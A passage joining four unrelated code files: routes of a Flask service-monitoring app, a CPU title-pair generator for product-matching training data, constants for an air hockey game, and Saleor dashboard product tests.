        payload = json.dumps([o.dump() for o in subs], default=json_util.default)
        return Response(payload, mimetype='application/json')
    body = request.get_json()
    service_id = body['id']
    action = body['status']
    if action == "remove":
        existing = Subscription.query.filter_by(
            id_user=g.user.id, id_service=service_id).first()
        if existing is not None:
            db.session.delete(existing)
            db.session.commit()
            return "Success", 200
        # NOTE(review): removing a non-existent subscription falls through
        # with no return (implicit None) — quirk preserved from the original.
    elif action == "add":
        if Subscription.query.filter_by(
                id_user=g.user.id, id_service=service_id).first() is None:
            db.session.add(Subscription(
                id_user=g.user.id, id_service=service_id, status=1))
            db.session.commit()
            return "Success", 200
        else:
            return "You've already subscribed this service", 400
    else:
        return "Bad request", 400
@app.route('/dashboard', methods=['GET','POST'])
@login_required
def dashboard():
    """Render the dashboard with up/down/unspecified service percentages."""
    user = g.user
    # First organization mapping of the logged-in user -> organization scope.
    org_id = User_Organization_mapping.query.filter_by(id_user=user.id).first()
    # Count the services of this organization in each state.
    up_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.up).count()
    down_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.down).count()
    unspecified_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.unspecified).count()
    all_services = Service.query.filter_by(organization_id=org_id.id_organization).count()
    # Integer percentages of each state (guard against division by zero).
    if all_services != 0:
        percent_up_services = int(float(up_services)/float(all_services)*100)
        percent_down_services = int(float(down_services)/float(all_services)*100)
        percent_unspecified_services = int(float(unspecified_services)/float(all_services)*100)
    else:
        percent_up_services = 0
        percent_down_services = 0
        percent_unspecified_services = 0
    # int() truncation can make the shares sum to less than 100; pad one
    # non-zero share so the displayed total adds up.
    # NOTE(review): a single +1 only closes a 1-point gap; three truncations
    # can leave a 2-point gap — confirm whether that matters for the chart.
    if percent_up_services + percent_down_services + percent_unspecified_services < 100:
        if percent_up_services != 0:
            percent_up_services = percent_up_services + 1
        elif percent_down_services != 0:
            percent_down_services = percent_down_services + 1
        elif percent_unspecified_services != 0:
            percent_unspecified_services = percent_unspecified_services + 1
    return render_template('dashboard.html', title="DevOps Nokia Project", user=user, panel="dashboard", org_name=org_id.organization.name, percent_up_services=percent_up_services, percent_down_services=percent_down_services, percent_unspecified_services=percent_unspecified_services)
@app.route('/services', methods=['GET', 'POST'])
@login_required
def services():
    """Render the table of services belonging to the admin's organization."""
    org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        org_services = db.session.query(Service).filter_by(
            organization_id=org_id.id_organization).all()
        return render_template('services.html',
                               services_table=ServicesTable(org_services),
                               panel="services",
                               org_name=org_id.organization.name)
@app.route('/invite', methods=['GET', 'POST'])
@login_required
def invite():
    """Email a registration invitation (with a one-week token) to a new user."""
    admin_org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        return render_template('invite.html', panel="invite")
    # get email from template
    email = request.form['email']
    # Refuse to invite someone already in the admin's organization.
    user = User.query.filter_by(email=email).first()
    if user is not None:
        for org in user.organizations:
            if org.id_organization == admin_org.id_organization:
                return render_template('invite.html', panel="invite", exist="Ten e-mail juz istnieje w biezacej organizacji!!!")
    # create a client for sending emails
    sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
    # email's data
    # NOTE(review): the sender address appears redacted — restore the real
    # from-address before deploying.
    from_email = Email("<EMAIL>")
    subject = "You got invited to awesome app!"
    to_email = Email(email)
    # generates token for an email; valid for 7 days
    token = Tokens(token=generate_registration_token(email), email=email, date=datetime.datetime.now()+datetime.timedelta(days=7))
    # BUG FIX: removed a dead Content("Hello, World!") assignment that was
    # immediately overwritten by the real message body below.
    content = Content("text/plain", "Hello! You've got invited to DevOps project. To continue "+
                      "the registration click this link: "+
                      "https://devops-nokia.herokuapp.com/register/"+token.token+"/"+str(admin_org.id_organization)+
                      " You have 7 days for sign up, after that your token will be deactivated.")
    # creating the mail
    mail = Mail(from_email, subject, to_email, content)
    # sending the email
    sg.client.mail.send.post(request_body=mail.get())
    db.session.add(token)
    db.session.commit()
    flash('E-mail sent successfully')
    return redirect(request.args.get('next') or url_for('users'))
@app.route('/add_service', methods=['GET', 'POST'])
@login_required
def add_service():
    """Add a new monitored service to the admin's organization."""
    org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        return render_template('add_service.html', panel="add_service")
    # get the values from the template
    address = request.form['service_address']
    name = request.form['service_name']
    # Prepend a scheme when the user typed a bare host name.
    # (idiom fix: str.startswith with a tuple replaces manual slicing)
    if not address.startswith(('http://', 'https://')):
        address = 'http://' + address
    # Reject duplicates (same address or same name) within the organization.
    address_check = Service.query.filter_by(address=address, organization_id=org_id.id_organization).first()
    name_check = Service.query.filter_by(name=name, organization_id=org_id.id_organization).first()
    if address_check or name_check:
        return redirect(url_for('add_service'))
    # creating a new service
    new_service = Service(address=address, name=name, time_of_added=datetime.datetime.now(), organization_id=org_id.id_organization)
    db.session.add(new_service)
    db.session.commit()
    return redirect(request.args.get('next') or url_for('services'))
@app.route('/settings',methods=['GET','POST'])
@login_required
def settings():
    """Settings page: rename the organization and/or change the password."""
    org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        return render_template('settings.html', org_name=org.organization.name)
    # Rename the organization only when the new name is not already taken.
    org_name = request.form['organization_name']
    if Organization.query.filter_by(name=org_name).first() is None:
        org.organization.name = org_name
    # Change the password only when the old one verifies.
    old_password = request.form['old_password']
    check_pass = bcrypt.checkpw(old_password.encode(), g.user.password.encode())
    if check_pass:
        password = request.form['password']
        password_bytes = password.encode('utf-8')
        hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
        g.user.password = hashed
        # NOTE(review): the commit runs only after a successful password
        # check, so an organization rename alone may never be persisted —
        # confirm whether the commit should be unconditional.
        db.session.commit()
    return redirect(request.args.get('next') or url_for('settings'))
@app.route('/fix_service',methods=['GET','POST'])
def fix_android():
    """Android endpoint: claim or release a service for repair.

    Expects JSON {'service_id': ..., 'in_repairing': bool}. Claiming
    records the current user as the repairer and pushes a yellow-icon
    notification; releasing clears the repairer and pushes a red 'DOWN'
    notification.
    """
    if current_user.is_authenticated():
        if request.method == 'GET':
            return "Blad", 400
        json_dict = request.get_json()
        service_id = json_dict['service_id']
        in_repairing = json_dict['in_repairing']
        get_serv = Service.query.filter_by(id=service_id).first()
        if in_repairing == True:
            # Claim: only when the service exists and nobody repairs it yet.
            if get_serv != None and get_serv.service_repairer_id == None:
                get_serv.service_repairer_id = g.user.id
                db.session.commit()
                notification_fix( "icon_yellow", get_serv )
                return "Success", 200
            else:
                return "Bad request", 400
        elif in_repairing == False:
            # Release: only when the service exists and is being repaired.
            if get_serv != None and get_serv.service_repairer_id != None:
                get_serv.service_repairer_id = None
                db.session.commit()
                send_notification( "icon_red", get_serv, "DOWN" )
                return "Success", 200
            else:
                return "Bad request", 400
        else:
            # in_repairing was neither true nor false in the JSON payload.
            return "Bad request", 400
    else:
        return "Blad", 400
@app.route('/stats_android')
def stats_android():
    """Android endpoint: up/down/unspecified service percentages as JSON.

    Unlike the web dashboard, this aggregates over *all* organizations the
    user belongs to, not just the first one.
    """
    if current_user.is_authenticated():
        up_services=0
        down_services=0
        unspecified_services=0
        all_services=0
        # Sum per-state service counts across every organization membership.
        users=User_Organization_mapping.query.filter_by(id_user=g.user.id).all()
        for x in users:
            up_services = up_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.up).count()
            down_services = down_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.down).count()
            unspecified_services = unspecified_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.unspecified).count()
            all_services = all_services + Service.query.filter_by(organization_id=x.id_organization).count()
        # Integer percentages (guard against division by zero).
        if all_services != 0:
            percent_up_services = int(float(up_services)/float(all_services)*100)
            percent_down_services = int(float(down_services)/float(all_services)*100)
            percent_unspecified_services = int(float(unspecified_services)/float(all_services)*100)
        else:
            percent_up_services = 0
            percent_down_services = 0
            percent_unspecified_services = 0
        # int() truncation can leave the shares summing below 100; pad one
        # non-zero share so the client-side chart closes.
        if percent_up_services + percent_down_services + percent_unspecified_services < 100:
            if percent_up_services != 0:
                percent_up_services = percent_up_services + 1
            elif percent_down_services != 0:
                percent_down_services = percent_down_services + 1
            elif percent_unspecified_services != 0:
                percent_unspecified_services = percent_unspecified_services + 1
        items={"up":percent_up_services, "down":percent_down_services, "unspecified":percent_unspecified_services}
        return Response((json.dumps(items, default=json_util.default)), mimetype='application/json')
    else:
        return "Blad", 400
@app.route('/history', methods=['GET', 'POST'])
@login_required
def history():
    """Render the event-history table for the admin's organization."""
    org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        events = db.session.query(History).filter_by(
            organization_id=org_id.id_organization).all()
        return render_template('history.html',
                               history_table=HistoryTable(events),
                               panel="history",
                               org_name=org_id.organization.name)
@app.route('/statistics', methods=['GET', 'POST'])
@login_required
def statistics():
    """Render per-service uptime statistics for the admin's organization."""
    org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        items = []
        for service in Service.query.filter_by(organization_id=org_id.id_organization).all():
            if service.current_state == ServiceState.up:
                # Time in the current UP stretch, shown without microseconds.
                timedelta_uptime = datetime.datetime.now() - service.time_of_last_change_of_state
                timedelta_uptime = str(timedelta_uptime).split(".")[0]
                delta_uptime = (datetime.datetime.now() - service.time_of_last_change_of_state).seconds
            else:
                timedelta_uptime = '00:00:00'
                delta_uptime = (datetime.datetime.now() - service.time_of_added).seconds - (datetime.datetime.now() - service.time_of_last_change_of_state).seconds
            # NOTE(review): timedelta.seconds wraps every 24h; consider
            # total_seconds() if multi-day uptimes must be accurate.
            delta_time_of_added = (datetime.datetime.now() - service.time_of_added).seconds
            # BUG FIX: a freshly added service has delta_time_of_added == 0,
            # which used to crash with ZeroDivisionError.
            if delta_time_of_added > 0:
                percentage_uptime = int(float(delta_uptime) / float(delta_time_of_added) * 100.0)
            else:
                percentage_uptime = 0
            items.append(StatItem(service.name, timedelta_uptime, percentage_uptime))
        statistics_table = StatisticsTable(items)
        return render_template('statistics.html', statistics_table=statistics_table, panel="statistics", org_name=org_id.organization.name)
|
<gh_stars>10-100
import pandas as pd
import os
from tqdm import tqdm
import random
from itertools import combinations
from supervised_product_matching.model_preprocessing import remove_stop_words
from src.common import create_final_data
def cpu_variations(cpu):
    """Return several equivalent title spellings for one CPU record.

    E.g. 'amd ryzen 5 3600 6 core 3.6 ghz processor',
    'amd ryzen 5 3600', 'amd ryzen 5 3600 6 core processor' and
    'amd ryzen 5 3600 3.6 ghz processor'.
    """
    name, cores, clock = cpu['name'], cpu['cores'], cpu['core_clock']
    templates = [
        '{} {} core {} processor'.format(name, cores, clock),  # full spec
        name,                                                  # bare model name
        '{} {} core processor'.format(name, cores),            # core count only
        '{} {} processor'.format(name, clock),                 # clock speed only
    ]
    return [remove_stop_words(t) for t in templates]
def generate_pos_cpu_data():
    """Build positive (matching) CPU title pairs.

    Every pair combines two different spellings of the same CPU, so the
    label is always 1. Reads data/base/cpu_data.csv, whose rows carry
    (name, cores, core_clock).
    """
    cpu_df = pd.read_csv('data/base/cpu_data.csv')
    rows = cpu_df.iloc()
    pairs = []
    for idx in tqdm(range(len(cpu_df))):
        spellings = cpu_variations(rows[idx])
        # Every unordered 2-element combination of spellings is a match.
        for left, right in combinations(spellings, 2):
            pairs.append([left, right, 1])
    return pd.DataFrame(pairs, columns=['title_one', 'title_two', 'label'])
def generate_neg_cpu_data():
    '''
    Creates negative CPU data that uses two different CPUs to create a pair.

    For each CPU, a different CPU is sampled (biased ~65% toward the other
    brand) and every title spelling of one is paired with every spelling
    of the other, labeled 0.
    '''
    cpu_df = pd.read_csv('data/base/cpu_data.csv')
    cpu_df_iloc = cpu_df.iloc()
    neg_df = []
    for idx in tqdm(range(len(cpu_df))):
        cpu = cpu_df_iloc[idx]
        key_brand = 'amd'
        # Placeholder for now
        neg_cpu = cpu
        # Choose the brand of the negative: with probability ~0.65 pick the
        # *other* brand, otherwise stay within the same brand (harder negatives).
        if 'amd' in cpu['name'].lower():
            if random.random() > 0.65:
                key_brand = 'amd'
            else:
                key_brand = 'intel'
        elif 'intel' in cpu['name'].lower():
            if random.random() > 0.65:
                key_brand = 'intel'
            else:
                key_brand = 'amd'
        # Resample until we draw a *different* CPU of the chosen brand.
        # NOTE(review): this loops forever if the CSV contains no other CPU
        # of key_brand — confirm the dataset always has both brands.
        while key_brand not in neg_cpu['name'].lower() or cpu['name'] == neg_cpu['name']:
            neg_cpu = cpu_df_iloc[random.randrange(0, len(cpu_df))]
        orig_variations = cpu_variations(cpu)
        neg_variations = cpu_variations(neg_cpu)
        # Pair every spelling of the original with every spelling of the
        # negative; label 0 = non-matching pair.
        for orig_cpu in orig_variations:
            for neg_variation in neg_variations:
                neg_df.append([orig_cpu, neg_variation, 0])
    return pd.DataFrame(neg_df, columns=['title_one', 'title_two', 'label'])
def create_general_cpu_data():
    '''
    Runs through generate_pos_cpu_data() and generate_neg_cpu_data() to
    create positive and negative data, then saves the combined result to
    data/train/more_cpu_data.csv. Skips generation if the file exists.
    '''
    file_path = 'data/train/more_cpu_data.csv'
    if not os.path.exists(file_path):
        print('Generating general cpu data . . . ')
        # Create the positive and negative examples
        pos_df = generate_pos_cpu_data()
        neg_df = generate_neg_cpu_data()
        # Concatenate the data and save it
        final_cpu_df = create_final_data(pos_df, neg_df)
        final_cpu_df.to_csv(file_path)
    else:
        # BUG FIX: the message previously read "general cpu data data".
        print('Already have general cpu data. Moving on . . .')
|
<gh_stars>0
import pathlib
from game.casting.color import Color
"""
CONSTANTS: used to declare constants that will be used in the game
"""
# --------------------------------------------------------------------------------------------------
# GENERAL GAME CONSTANTS
# --------------------------------------------------------------------------------------------------
# GAME
GAME_NAME = "Air Hockey Game - Group 8"
FRAME_RATE = 60
# SCREEN
SCREEN_WIDTH = 1100
SCREEN_HEIGHT = 750
CENTER_X = SCREEN_WIDTH / 2
CENTER_Y = SCREEN_HEIGHT / 2
# FIELD
FIELD_TOP = 90
FIELD_BOTTOM = SCREEN_HEIGHT - 80
FIELD_LEFT = 30
FIELD_RIGHT = SCREEN_WIDTH - 30
GOAL_GROUP = "goals"
# LEFT
# GOAL_A
GOAL_TOP = 80
GOAL_BOTTOM = SCREEN_HEIGHT-10
GOAL_LEFT = 30
# RIGHT
# GOAL_B
GOAL_RIGHT = SCREEN_WIDTH - 81
# FONT
FONT_FILE = "air_hockey/assets/fonts/zorque.otf"
FONT_SMALL = 32
FONT_LARGE = 48
# SOUND
COUNTDOWN_A = "air_hockey/assets/sounds/countdown_a.wav"
COUNTDOWN_B = "air_hockey/assets/sounds/countdown_b.wav"
GOAL = "air_hockey/assets/sounds/goal.wav"
PUCK_DROP = "air_hockey/assets/sounds/puck_drop.wav"
SLIDE = "air_hockey/assets/sounds/slide.wav"
SLIDE_HIT = "air_hockey/assets/sounds/slide_hit.wav"
# TEXT
ALIGN_CENTER = 0
ALIGN_LEFT = 1
ALIGN_RIGHT = 2
# COLORS
BLACK = Color(0, 0, 0)
WHITE = Color(255, 255, 255)
PURPLE = Color(255, 0, 255)
# KEYS
A = "a"
S = "s"
D = "d"
W = "w"
LEFT = "left"
RIGHT = "right"
UP = "up"
DOWN = "down"
SPACE = "space"
ENTER = "enter"
PAUSE = "p"
# SCENES
NEW_GAME = 0
TRY_AGAIN = 1
IN_PLAY = 3
GAME_OVER = 4
# --------------------------------------------------------------------------------------------------
# SCRIPTING CONSTANTS
# --------------------------------------------------------------------------------------------------
# PHASES
INITIALIZE = 0
LOAD = 1
INPUT = 2
UPDATE = 3
OUTPUT = 4
UNLOAD = 5
RELEASE = 6
# --------------------------------------------------------------------------------------------------
# CASTING CONSTANTS
# --------------------------------------------------------------------------------------------------
# STATS
STATS_GROUP = "stats"
# HUD
HUD_MARGIN = 15
SCORE_GROUP = "score"
SCORE_FORMAT = "SCORE: {}"
PLAYER_A= "Player 1: {}"
PLAYER_B= "Player 2: {}"
# SURFACE
SURFACE_GROUP = "surface"
SURFACE_IMAGE = "air_hockey/assets/images/surface.png"
SURFACE_WIDTH = 1040
SURFACE_HEIGHT = 669
# PUCK
PUCK_GROUP = "pucks"
PUCK_IMAGE = "air_hockey/assets/images/puck.png"
PUCK_WIDTH = 50
PUCK_HEIGHT = 50
PUCK_VELOCITY = 6
# STRIKERS
STRIKER_GROUP = "striker"
STRIKER_GROUP2 = "striker2"
STRIKER_IMAGES = "air_hockey/assets/images/striker.png"
STRIKER2_IMAGES = "air_hockey/assets/images/striker2.png"
STRIKER_WIDTH = 100
STRIKER_HEIGHT = 99
STRIKER_RATE = 6
STRIKER_VELOCITY = 8
# DIALOG
DIALOG_GROUP = "dialogs"
ENTER_TO_START = "PRESS ENTER TO START"
FACEOFF = "FACEOFF"
WAS_GOOD_GAME = "GAME OVER"
|
<reponame>arslanahmd/Ghar-Tameer<gh_stars>0
from io import BytesIO
import json
from unittest.mock import Mock, MagicMock
from PIL import Image
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import HiddenInput
from django.urls import reverse
from django.utils.encoding import smart_text
import pytest
from saleor.dashboard.product import ProductBulkAction
from saleor.dashboard.product.forms import (
ProductBulkUpdate, ProductClassForm, ProductForm)
from saleor.product.forms import VariantChoiceField
from saleor.product.models import (
AttributeChoiceValue, Product, ProductAttribute, ProductClass,
ProductImage, ProductVariant, Stock, StockLocation)
# Expected HTTP status codes for assertions in this module.
# NOTE(review): not referenced in this chunk — they may be used further
# down the file; confirm before removing.
HTTP_STATUS_OK = 200
HTTP_REDIRECTION = 302
def create_image():
    """Create a tiny in-memory JPEG upload for image-upload tests.

    Returns a (SimpleUploadedFile, base_name) tuple; the file contains a
    single red pixel encoded as JPEG.
    """
    img_data = BytesIO()
    image = Image.new('RGB', size=(1, 1), color=(255, 0, 0, 0))
    image.save(img_data, format='JPEG')
    image_name = 'product2'
    # BUG FIX: the content type said 'image/png' although the payload is JPEG.
    image = SimpleUploadedFile(
        image_name + '.jpg', img_data.getvalue(), 'image/jpeg')
    return image, image_name
@pytest.mark.integration
@pytest.mark.django_db
def test_stock_record_update_works(admin_client, product_in_stock):
    """POSTing the stock-update form bumps quantity but leaves allocation alone."""
    variant = product_in_stock.variants.get()
    # Pick the stock record with the largest allocated quantity.
    stock = variant.stock.order_by('-quantity_allocated').first()
    quantity = stock.quantity
    quantity_allocated = stock.quantity_allocated
    url = reverse(
        'dashboard:variant-stock-update',
        kwargs={
            'product_pk': product_in_stock.pk,
            'variant_pk': variant.pk,
            'stock_pk': stock.pk})
    # Submit the same record with quantity increased by 5.
    admin_client.post(url, {
        'variant': stock.variant_id, 'location': stock.location.id,
        'cost_price': stock.cost_price.net,
        'quantity': quantity + 5})
    # Reload and verify: quantity updated, allocation untouched.
    new_stock = variant.stock.get(pk=stock.pk)
    assert new_stock.quantity == quantity + 5
    assert new_stock.quantity_allocated == quantity_allocated
def test_valid_product_class_form(color_attribute, size_attribute):
    """Disjoint product/variant attribute sets validate; overlapping ones don't."""
    payload = {
        'name': "Testing Class",
        'product_attributes': [color_attribute.pk],
        'variant_attributes': [size_attribute.pk],
        'has_variants': True}
    assert ProductClassForm(payload).is_valid()
    # The same attribute may not appear in both attribute sets.
    payload['variant_attributes'] = [color_attribute.pk, size_attribute.pk]
    payload['product_attributes'] = [size_attribute.pk]
    assert not ProductClassForm(payload).is_valid()
def test_variantless_product_class_form(color_attribute, size_attribute):
    """A class without variants must not declare variant attributes."""
    payload = {
        'name': "Testing Class",
        'product_attributes': [color_attribute.pk],
        'variant_attributes': [],
        'has_variants': False}
    assert ProductClassForm(payload).is_valid()
    # Variant attributes are invalid when has_variants is off.
    payload = {
        'name': "Testing Class",
        'product_attributes': [color_attribute.pk],
        'variant_attributes': [size_attribute.pk],
        'has_variants': False}
    assert not ProductClassForm(payload).is_valid()
def test_edit_used_product_class(db):
    """has_variants may be disabled only while every product has at most one variant."""
    product_class = ProductClass.objects.create(
        name='New class', has_variants=True)
    product = Product.objects.create(
        name='Test product', price=10, product_class=product_class)
    ProductVariant.objects.create(product=product, sku='1234')
    # When all products have only one variant you can change
    # has_variants to false
    assert product.variants.all().count() == 1
    data = {
        'name': product_class.name,
        'product_attributes': product_class.product_attributes.all(),
        'variant_attributes': product_class.variant_attributes.all(),
        'has_variants': False}
    form = ProductClassForm(data, instance=product_class)
    assert form.is_valid()
    # Keeping has_variants on is always allowed.
    data = {
        'name': product_class.name,
        'product_attributes': product_class.product_attributes.all(),
        'variant_attributes': product_class.variant_attributes.all(),
        'has_variants': True}
    form = ProductClassForm(data, instance=product_class)
    assert form.is_valid()
    # Test has_variants validator which prevents turning off when product
    # has multiple variants
    ProductVariant.objects.create(product=product, sku='12345')
    assert product.variants.all().count() == 2
    data = {
        'name': product_class.name,
        'product_attributes': product_class.product_attributes.all(),
        'variant_attributes': product_class.variant_attributes.all(),
        'has_variants': False}
    form = ProductClassForm(data, instance=product_class)
    assert not form.is_valid()
    # The rejection is reported on the has_variants field specifically.
    assert 'has_variants' in form.errors.keys()
def test_change_attributes_in_product_form(
        db, product_in_stock, color_attribute):
    """Saving ProductForm persists both choice-valued and free-text attributes."""
    product = product_in_stock
    product_class = product.product_class
    # Add a free-text attribute alongside the existing choice attribute.
    text_attribute = ProductAttribute.objects.create(
        slug='author', name='Author')
    product_class.product_attributes.add(text_attribute)
    color_value = color_attribute.values.first()
    new_author = 'Main Tester'
    new_color = color_value.pk
    # Attribute fields are submitted with an 'attribute-<slug>' prefix.
    data = {
        'name': product.name,
        'price': product.price.gross,
        'categories': [c.pk for c in product.categories.all()],
        'description': 'description',
        'attribute-author': new_author,
        'attribute-color': new_color}
    form = ProductForm(data, instance=product)
    assert form.is_valid()
    product = form.save()
    # Choice attributes store the value pk (as text); text attributes store
    # the raw string.
    assert product.get_attribute(color_attribute.pk) == smart_text(new_color)
    assert product.get_attribute(text_attribute.pk) == new_author
def test_attribute_list(db, product_in_stock, color_attribute, admin_client):
    """The attribute list view renders for an admin user."""
    assert ProductAttribute.objects.count() == 2
    response = admin_client.get(reverse('dashboard:product-attributes'))
    assert response.status_code == 200
def test_attribute_detail(color_attribute, admin_client):
    """The attribute detail view renders for an admin user."""
    detail_url = reverse('dashboard:product-attribute-detail',
                         kwargs={'pk': color_attribute.pk})
    assert admin_client.get(detail_url).status_code == 200
def test_attribute_add(color_attribute, admin_client):
    """Posting valid data to the add view creates a new attribute."""
    assert ProductAttribute.objects.count() == 1
    add_url = reverse('dashboard:product-attribute-add')
    response = admin_client.post(
        add_url, {'name': 'test', 'slug': 'test'}, follow=True)
    assert response.status_code == 200
    assert ProductAttribute.objects.count() == 2
def test_attribute_add_not_valid(color_attribute, admin_client):
    """Posting an empty payload must not create an attribute."""
    assert ProductAttribute.objects.count() == 1
    add_url = reverse('dashboard:product-attribute-add')
    response = admin_client.post(add_url, {}, follow=True)
    assert response.status_code == 200
    assert ProductAttribute.objects.count() == 1
def test_attribute_edit(color_attribute, admin_client):
    """Posting new values to the update view renames the attribute in place."""
    assert ProductAttribute.objects.count() == 1
    edit_url = reverse('dashboard:product-attribute-update',
                       kwargs={'pk': color_attribute.pk})
    payload = {'name': 'new_name', 'slug': 'new_slug'}
    response = admin_client.post(edit_url, payload, follow=True)
    assert response.status_code == 200
    assert ProductAttribute.objects.count() == 1
    color_attribute.refresh_from_db()
    assert color_attribute.name == 'new_name'
    assert color_attribute.slug == 'new_slug'
def test_attribute_delete(color_attribute, admin_client):
    """Posting to the delete view removes the attribute."""
    assert ProductAttribute.objects.count() == 1
    delete_url = reverse('dashboard:product-attribute-delete',
                         kwargs={'pk': color_attribute.pk})
    response = admin_client.post(delete_url, follow=True)
    assert response.status_code == 200
    assert not ProductAttribute.objects.exists()
def test_attribute_choice_value_add(color_attribute, admin_client):
    """A valid post to the value-add view creates a third choice value."""
    assert AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk).count() == 2
    add_url = reverse('dashboard:product-attribute-value-add',
                      kwargs={'attribute_pk': color_attribute.pk})
    payload = {'name': 'Pink', 'color': '#FFF', 'attribute': color_attribute.pk}
    response = admin_client.post(add_url, payload, follow=True)
    assert response.status_code == 200
    assert AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk).count() == 3
def test_attribute_choice_value_add_not_valid(color_attribute, admin_client):
    """An empty post to the value-add view must not create a value."""
    assert AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk).count() == 2
    add_url = reverse('dashboard:product-attribute-value-add',
                      kwargs={'attribute_pk': color_attribute.pk})
    response = admin_client.post(add_url, {}, follow=True)
    assert response.status_code == 200
    assert AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk).count() == 2
def test_attribute_choice_value_edit(color_attribute, admin_client):
    """Posting new data to the value-update view renames the choice value."""
    choice_values = AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk)
    assert choice_values.count() == 2
    edit_url = reverse('dashboard:product-attribute-value-update',
                       kwargs={'attribute_pk': color_attribute.pk,
                               'value_pk': choice_values[0].pk})
    payload = {'name': 'Pink', 'color': '#FFF', 'attribute': color_attribute.pk}
    response = admin_client.post(edit_url, payload, follow=True)
    assert response.status_code == 200
    renamed = AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk, name='Pink')
    assert renamed.count() == 1
    assert renamed[0].name == 'Pink'
def test_attribute_choice_value_delete(color_attribute, admin_client):
    """Posting to the value-delete view removes exactly the chosen value."""
    choice_values = AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk)
    assert choice_values.count() == 2
    doomed_value = choice_values[0]
    delete_url = reverse('dashboard:product-attribute-value-delete',
                         kwargs={'attribute_pk': color_attribute.pk,
                                 'value_pk': doomed_value.pk})
    response = admin_client.post(delete_url, follow=True)
    assert response.status_code == 200
    remaining = AttributeChoiceValue.objects.filter(
        attribute=color_attribute.pk)
    assert remaining.count() == 1
    assert doomed_value not in remaining
def test_get_formfield_name_with_unicode_characters(db):
    """Form field names keep non-ASCII attribute slugs intact."""
    unicode_slug = 'ąęαβδηθλμπ'
    attribute = ProductAttribute.objects.create(
        slug=unicode_slug, name=unicode_slug)
    assert attribute.get_formfield_name() == 'attribute-' + unicode_slug
def test_view_product_toggle_publish(db, admin_client, product_in_stock):
    """Each post to the publish view flips the product's published flag."""
    product = product_in_stock
    toggle_url = reverse('dashboard:product-publish',
                         kwargs={'pk': product.pk})
    response = admin_client.post(toggle_url)
    assert response.status_code == HTTP_STATUS_OK
    expected = {'success': True, 'is_published': False}
    assert json.loads(response.content.decode('utf8')) == expected
    # A second toggle publishes the product again.
    admin_client.post(toggle_url)
    product.refresh_from_db()
    assert product.is_published
def test_view_product_not_deleted_before_confirmation(
        db, admin_client, product_in_stock):
    """A GET on the delete view only shows confirmation; nothing is removed."""
    product = product_in_stock
    confirm_url = reverse('dashboard:product-delete',
                          kwargs={'pk': product.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    # Raises if the product had actually been deleted.
    product.refresh_from_db()
def test_view_product_delete(db, admin_client, product_in_stock):
    """Posting to the delete view removes the product."""
    product = product_in_stock
    delete_url = reverse('dashboard:product-delete',
                         kwargs={'pk': product.pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not Product.objects.filter(pk=product.pk).exists()
def test_view_product_class_not_deleted_before_confirmation(
        admin_client, product_in_stock):
    """A GET on the class-delete view must not remove the product class."""
    product_class = product_in_stock.product_class
    confirm_url = reverse(
        'dashboard:product-class-delete', kwargs={'pk': product_class.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert ProductClass.objects.filter(pk=product_class.pk).exists()
def test_view_product_class_delete(db, admin_client, product_in_stock):
    """Posting to the class-delete view removes the product class."""
    product_class = product_in_stock.product_class
    delete_url = reverse(
        'dashboard:product-class-delete', kwargs={'pk': product_class.pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not ProductClass.objects.filter(pk=product_class.pk).exists()
def test_view_product_variant_not_deleted_before_confirmation(
        admin_client, product_in_stock):
    """A GET on the variant-delete view must not remove the variant."""
    variant_pk = product_in_stock.variants.first().pk
    confirm_url = reverse(
        'dashboard:variant-delete',
        kwargs={'product_pk': product_in_stock.pk,
                'variant_pk': variant_pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert ProductVariant.objects.filter(pk=variant_pk).exists()
def test_view_product_variant_delete(admin_client, product_in_stock):
    """Posting to the variant-delete view removes the variant."""
    variant_pk = product_in_stock.variants.first().pk
    delete_url = reverse(
        'dashboard:variant-delete',
        kwargs={'product_pk': product_in_stock.pk,
                'variant_pk': variant_pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not ProductVariant.objects.filter(pk=variant_pk).exists()
def test_view_stock_not_deleted_before_confirmation(
        admin_client, product_in_stock):
    """A GET on the stock-delete view must not remove the stock record."""
    variant = product_in_stock.variants.first()
    stock = Stock.objects.filter(variant=variant).first()
    confirm_url = reverse(
        'dashboard:variant-stock-delete',
        kwargs={'product_pk': product_in_stock.pk,
                'variant_pk': variant.pk,
                'stock_pk': stock.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert Stock.objects.filter(pk=stock.pk).exists()
def test_view_stock_delete(admin_client, product_in_stock):
    """Posting to the stock-delete view removes the stock record."""
    variant = product_in_stock.variants.first()
    stock = Stock.objects.filter(variant=variant).first()
    delete_url = reverse(
        'dashboard:variant-stock-delete',
        kwargs={'product_pk': product_in_stock.pk,
                'variant_pk': variant.pk,
                'stock_pk': stock.pk})
